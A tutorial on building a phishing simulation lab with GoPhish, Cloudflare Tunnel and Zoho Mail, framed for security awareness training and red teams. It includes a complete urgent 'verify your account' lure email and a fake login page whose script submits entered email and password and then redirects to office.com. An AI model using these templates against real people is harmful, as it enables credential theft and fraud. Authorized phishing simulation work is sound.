Setting Up a Phishing Simulation Server with GoPhish, CF Tunnel & Zoho Mail

A complete phishing lab setup using GoPhish, Cloudflare Tunnel, and Zoho, ideal for simulations.

This guide walks you through spinning up a phishing simulation lab using GoPhish, Cloudflare Tunnel for secure public access, and Zoho Mail for sending test campaigns. Ideal for internal awareness training or red team environments.


Basic Server Preparation

First, update your system and install the required packages:

sudo apt update && sudo apt upgrade -y
sudo apt install unzip curl -y

Before exposing anything publicly, lock down your server using ufw to allow only traffic from Cloudflare and block direct IP access to sensitive ports like :3333 (GoPhish Admin) and :80 (landing pages).

Enable UFW

sudo apt install ufw -y
sudo ufw default deny incoming
sudo ufw default allow outgoing

Allow SSH

sudo ufw allow ssh

Cloudflare publishes its IP ranges here: https://www.cloudflare.com/ips/

You can allow only these IPs to reach your server:

# Example for IPv4
sudo ufw allow from 173.245.48.0/20 to any port 80 proto tcp
sudo ufw allow from 173.245.48.0/20 to any port 3333 proto tcp

# Repeat for other Cloudflare IP blocks
This ensures that only traffic routed through your Cloudflare Tunnel is allowed and direct access to your server’s IP is blocked.

Step 4: Enable UFW

sudo ufw enable
sudo ufw status verbose
Now your GoPhish Admin Panel (:3333) and landing pages (:80) will only be accessible via your custom Cloudflare hostname, not via raw IP.

Install GoPhish

Download and extract GoPhish:

curl -LO https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-*.zip
cd gophish
chmod +x gophish

Before launching, edit the admin interface config:

nano config.json

Find:

"admin_server": {
  "listen_url": "127.0.0.1:3333",

Change it to:

"admin_server": {
  "listen_url": "localhost:3333",
Important: localhost and 127.0.0.1 behave differently with Cloudflare Tunnel. Stick to localhost here.

Then launch GoPhish:

sudo ./gophish
  • Admin UI: https://localhost:3333
  • Campaign listener: http://0.0.0.0:80

Set Up Cloudflare Tunnel

Download and install cloudflared:

curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb -o cloudflared.deb
sudo dpkg -i cloudflared.deb

Create your tunnel:

cloudflared tunnel create gophish-tunnel

This generates a unique Tunnel ID and credentials JSON file (e.g., 3fe86d07-...json).

Tunnel Configuration

Create your config at /etc/cloudflared/config.yml:

tunnel: <Tunnel ID>
credentials-file: /etc/cloudflared/<Tunnel ID>.json

ingress:
  - hostname: gophish.yourdomain.com
    service: http://localhost:3333
  - service: http_status:404

Move files into place:

sudo mv ~/.cloudflared/* /etc/cloudflared/
sudo chown -R root:root /etc/cloudflared

Install the systemd service:

sudo cloudflared --config /etc/cloudflared/config.yml service install
sudo systemctl enable cloudflared
sudo systemctl start cloudflared

Verify with:

sudo cloudflared --config /etc/cloudflared/config.yml tunnel run

Cloudflare DNS

In the Cloudflare Dashboard:

  • Add a CNAME for gophish.yourdomain.com pointing to your tunnel ID (e.g. your-tunnel-id.cfargotunnel.com)
  • Set SSL to Full

Visit https://gophish.yourdomain.com to access the GoPhish admin panel.


Run GoPhish as a Service

Create a systemd service:

sudo nano /etc/systemd/system/gophish.service

Paste:

[Unit]
Description=GoPhish Phishing Framework
After=network.target

[Service]
Type=simple
ExecStart=/root/gophish/gophish
WorkingDirectory=/root/gophish
Restart=always
RestartSec=5
User=root

[Install]
WantedBy=multi-user.target

Enable and start:

sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl enable gophish
sudo systemctl start gophish

Check status to get the admin credentials:

sudo systemctl status gophish

Email Sending with Zoho Mail

Step 1: Setup Zoho

  1. Go to zoho.com/mail
  2. Click Get Started under Business Email → choose Free Plan
  3. Sign up or log in

Step 2: Add Your Domain

  • Choose Cloudflare as your DNS manager
  • Add TXT record in Cloudflare to verify ownership

Step 3: Configure DNS Records

In Cloudflare DNS settings, add Zoho's required MX, SPF, and DKIM records.

If using Cloudflare Email Routing. remove and disable it after initial account verification to avoid MX record conflicts.

Verify all DNS records in the Zoho Admin Console under Mail Settings.


Step 4: Create SMTP App Password

  1. Log in to Zoho Mail
  2. Go to Security → App Passwords
  3. Generate a new app password and save it

Step 5: Add Sending Profile in GoPhish

In GoPhish → Sending Profiles > New Profile:

  • Name: your Zoho email
  • Interface Type: SMTP
  • SMTP From: your Zoho email
  • Host: smtp.zoho.eu:587
  • Username: your Zoho email
  • Password: app password
  • ✅ Uncheck "Ignore Certificate Errors"

Send a test email to confirm.


Launch Your First Campaign

1. Create Users & Groups

Go to Users & Groups, add a group and at least one test user.

2. Configure Tunnel for Public Landing Page

Add a new ingress route in your Cloudflare Tunnel config:

- hostname: campaign.yourdomain.com
  service: http://0.0.0.0:80

Restart the tunnel if needed:

sudo systemctl restart cloudflared

3. Email Template Example

<!DOCTYPE html>
<html>
  <body style="font-family: Arial, sans-serif; color: #333;">
    <p>Dear {{.FirstName}},</p>

    <p>We’ve detected unusual activity on your account and require you to confirm your login credentials to avoid temporary suspension.</p>

    <p>Please verify your account by clicking the link below:</p>

    <p>
      <a href="{{.URL}}" style="background-color:#007bff; color:white; padding:10px 15px; text-decoration:none; border-radius:5px;">
        Verify Now
      </a>
    </p>

    <p>If you do not verify within 24 hours, your account access may be restricted.</p>

    <p>Thank you,<br>The Security Team</p>

    <hr>
    <p style="font-size: 12px; color: gray;">This is an automated message. Please do not reply directly to this email.</p>
  </body>
</html>

4. Landing Page Example

Use this for capturing clicks and credentials:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Secure Login</title>
  <style>
    body {
      background-color: #f4f6f8;
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .login-container {
      background-color: white;
      padding: 40px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      width: 100%;
      max-width: 400px;
    }
    .login-container h2 {
      margin-bottom: 20px;
      text-align: center;
      color: #333;
    }
    input[type="email"],
    input[type="password"] {
      width: 100%;
      padding: 12px 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    button {
      width: 100%;
      padding: 12px;
      background-color: #007bff;
      color: white;
      border: none;
      border-radius: 5px;
      font-size: 16px;
      margin-top: 15px;
      cursor: pointer;
    }
    .note {
      margin-top: 15px;
      font-size: 12px;
      color: gray;
      text-align: center;
    }
    .popup {
      display: none;
      position: fixed;
      top: 0; left: 0;
      width: 100%; height: 100%;
      background: rgba(0,0,0,0.4);
      justify-content: center;
      align-items: center;
    }
    .popup-content {
      background: white;
      padding: 30px;
      border-radius: 10px;
      text-align: center;
      box-shadow: 0 0 20px rgba(0,0,0,0.3);
    }
  </style>
</head>
<body>
  <div class="login-container">
    <h2>Secure Portal</h2>
    <form id="phishForm" method="POST" action="/login">
      <input type="email" name="email" placeholder="Email address" required />
      <input type="password" name="password" placeholder="Password" required />
      <button type="submit">Sign In</button>
    </form>
    <p class="note">© 2025 Corporate Systems. All rights reserved.</p>
  </div>

  <div class="popup" id="popup">
    <div class="popup-content">
      <h3>Verification Complete</h3>
      <p>Your identity has been successfully verified.<br>You may close this window.</p>
    </div>
  </div>

  <script>
    document.getElementById("phishForm").addEventListener("submit", function(e) {
      e.preventDefault(); // Prevent redirect
      const form = e.target;

      // Send the credentials to GoPhish
      fetch(form.action, {
        method: "POST",
        body: new FormData(form)
      });

      // Show fake confirmation popup
      document.getElementById("popup").style.display = "flex";

      // Optional: Redirect after a delay
      setTimeout(() => {
        window.location.href = "https://www.office.com"; // Change to your desired redirect
      }, 3000);
    });
  </script>
</body>
</html>

Add a confirmation popup or redirect after form submission to mimic a real login flow.


5. Create Campaign

Go to Campaigns > New:

  • Name: Anything identifiable
  • Email Template: Your crafted email
  • Landing Page: Your phish page
  • URL: Your public domain (e.g. https://campaign.yourdomain.com)
  • Sending Profile: Zoho
  • Group: Your test user group

Schedule and launch! Use this responsibly.